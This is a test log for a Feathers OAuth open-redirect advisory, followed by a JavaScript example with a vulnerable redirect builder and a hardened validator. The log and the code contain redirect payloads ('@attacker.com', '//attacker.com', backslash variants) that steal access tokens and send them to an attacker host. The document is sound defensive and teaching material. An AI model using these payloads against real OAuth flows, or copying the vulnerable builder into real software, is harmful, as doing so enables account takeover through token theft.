[*] Testing GHSA-ppf9-4ffw-hh4p: Feathers OAuth Open Redirect

============================================================
TEST 1: URL Authority Injection with @ character
============================================================
Attack vector: ?redirect=@attacker.com
Expected behavior: https://target.com@attacker.com#access_token=...
Browser interpretation: username='target.com', host='attacker.com'

--- VULNERABLE VERSION (v5.0.39) ---
Generated URL: https://target.com@attacker.com#access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token
URL Analysis:
  - Protocol: https:
  - Username: target.com
  - Host: attacker.com
  - Fragment (contains token): #access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
[VULNERABLE] Token would be sent to attacker.com!

--- PATCHED VERSION (v5.0.40) ---
Request rejected: Invalid redirect path.
[SAFE] Attack was blocked!

============================================================
TEST 2: Protocol-relative URL Injection with //
============================================================
Attack vector: ?redirect=//attacker.com

--- VULNERABLE VERSION (v5.0.39) ---
Generated URL: https://target.com//attacker.com#access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token
URL Analysis:
  - Host: target.com

--- PATCHED VERSION (v5.0.40) ---
Request rejected: Invalid redirect path.
[SAFE] Attack was blocked!

============================================================
TEST 3: Backslash Character Attack
============================================================
Attack vector: ?redirect=\attacker.com
Note: Some browsers treat backslash as forward slash

--- VULNERABLE VERSION (v5.0.39) ---
Generated URL: https://target.com\attacker.com#access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token

--- PATCHED VERSION (v5.0.40) ---
Request rejected: Invalid redirect path.
[SAFE] Attack was blocked!
============================================================
SUMMARY
============================================================
The vulnerability allows an attacker to steal OAuth access tokens by injecting @, //, or \ into the redirect parameter. When the victim completes OAuth authentication, the access token is appended as a fragment to a URL that looks like it points at the legitimate site but is parsed by the browser as pointing at the attacker's host.

Example malicious URL: https://target.com@attacker.com#access_token=eyJhbGci...
Browser interprets this as:
  - Username: target.com
  - Host: attacker.com
  - Fragment: #access_token=... (not transmitted in the HTTP request, but readable by script on the attacker's page via location.hash)

Note on TEST 2 and TEST 3: when //attacker.com or \attacker.com is concatenated directly after the origin, as in the generated URLs above, the browser still parses the host as target.com and treats the rest as a path. These two vectors become exploitable where the redirect value is resolved as a relative URL against the origin (for example emitted as-is in a Location header): //attacker.com is then protocol-relative and lands on attacker.com, and a backslash is treated as a slash by WHATWG-conformant browsers, so /\attacker.com resolves the same way. This is why the patch rejects all three characters rather than only @.

The patched version (v5.0.40) validates the redirect parameter and rejects any path containing @, //, or \ characters.

========================================
VULNERABILITY CONFIRMED: GHSA-ppf9-4ffw-hh4p
========================================
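The parsing behaviour behind the three tests, as an added example that is not code from the Feathers project or from the advisory. It reproduces the log's vectors against a vulnerable-style builder whose shape (origin + redirect + '#access_token=' + token) is reconstructed from the "Generated URL" lines, shows where the same values land when resolved as a relative URL instead, and adds a hardened validator that rejects @, //, and \ and then checks the resolved origin. It also goes one step past the log by including /\attacker.com, the case the backslash rule exists to stop. The origin https://target.com and the token value are assumed; Node's global WHATWG URL class follows the same parsing rules as browsers.

```javascript
// Added example, not the Feathers project's code.
// Assumptions: app origin https://target.com (matching the log); the
// vulnerable builder's shape is reconstructed from the log's "Generated
// URL" lines; the token is a constructed sample value, not a real JWT.

const ORIGIN = 'https://target.com';
const SAMPLE_TOKEN = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.stolen_token';

// Vulnerable construction: the user-supplied redirect is glued onto the
// origin unchecked, then the access token is appended in the fragment.
function buildRedirectVulnerable(redirect, token = SAMPLE_TOKEN) {
  return `${ORIGIN}${redirect}#access_token=${token}`;
}

// Parse a generated URL the way a browser would and report where it lands.
function analyze(urlString) {
  const u = new URL(urlString);
  const ourHost = new URL(ORIGIN).host;
  return {
    protocol: u.protocol,
    username: u.username,
    host: u.host,
    pathname: u.pathname,
    fragment: u.hash,
    // The fragment is readable by script on whatever page the browser ends
    // up on, so a foreign host means the token leaks.
    leaksToken: u.host !== ourHost,
  };
}

// Where the same redirect value lands if the server emits it as a relative
// URL resolved against the origin (e.g. a Location header) instead of
// concatenating it. This is the case in which // and \ matter.
function hostIfResolvedRelative(redirect) {
  return new URL(redirect, ORIGIN).host;
}

// Hardened check, following the patched behaviour described in the log:
// reject '@', '//' and '\' outright, require a leading '/', then verify the
// resolved URL stays on our origin so any bypass of the character rule is
// still caught by the parser itself.
function validateRedirect(redirect) {
  const reject = { ok: false, reason: 'Invalid redirect path.' };
  if (typeof redirect !== 'string' || redirect.length === 0) return reject;
  if (redirect.includes('@') || redirect.includes('//') || redirect.includes('\\')) return reject;
  if (!redirect.startsWith('/')) return reject;
  let resolved;
  try {
    resolved = new URL(redirect, ORIGIN);
  } catch (e) {
    return reject;
  }
  if (resolved.origin !== ORIGIN) return reject;
  return { ok: true, href: resolved.href };
}

// Walk the vectors from the log, plus '/\attacker.com' and a benign path,
// and print where each lands under both constructions and the patched check.
const VECTORS = ['@attacker.com', '//attacker.com', '\\attacker.com', '/\\attacker.com', '/dashboard'];
for (const v of VECTORS) {
  const a = analyze(buildRedirectVulnerable(v));
  const check = validateRedirect(v);
  console.log(
    `${v.padEnd(16)} concatenated -> host=${a.host} user=${a.username || '-'} leaks=${a.leaksToken}` +
    ` | relative -> host=${hostIfResolvedRelative(v)}` +
    ` | patched: ${check.ok ? 'allowed ' + check.href : check.reason}`
  );
}
```

The origin comparison at the end of validateRedirect is the check worth keeping even if the character blocklist is later relaxed: it asks the same parser the browser uses where the redirect actually goes, rather than guessing from the characters in it.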